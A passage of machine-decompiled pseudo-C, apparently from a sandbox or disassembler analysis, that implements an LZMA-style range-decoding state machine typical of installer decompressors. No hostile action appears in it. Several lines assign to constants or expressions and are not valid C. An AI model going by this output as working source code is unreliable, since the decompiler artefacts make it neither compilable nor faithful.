								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004074A1))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
